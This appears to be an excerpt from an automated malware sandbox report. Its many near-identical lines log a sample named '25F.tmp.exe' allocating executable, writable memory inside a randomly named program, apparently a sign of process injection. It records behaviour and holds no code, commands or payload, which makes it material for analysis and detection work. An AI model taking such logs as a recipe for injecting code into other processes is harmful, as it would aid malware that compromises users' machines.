            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 380000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 410000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 350000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 310000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 380000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 210000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 220000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 320000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 510000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 190000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 840000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 400000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 820000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 5D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 910000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 390000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 220000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 150000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 7F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 250000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 260000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 280000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 260000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 5D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 230000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 190000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 250000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 270000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 150000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 750000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 120000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 550000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 250000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 390000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 380000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 820000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 380000 protect: page execute and read and writeJump to behavior
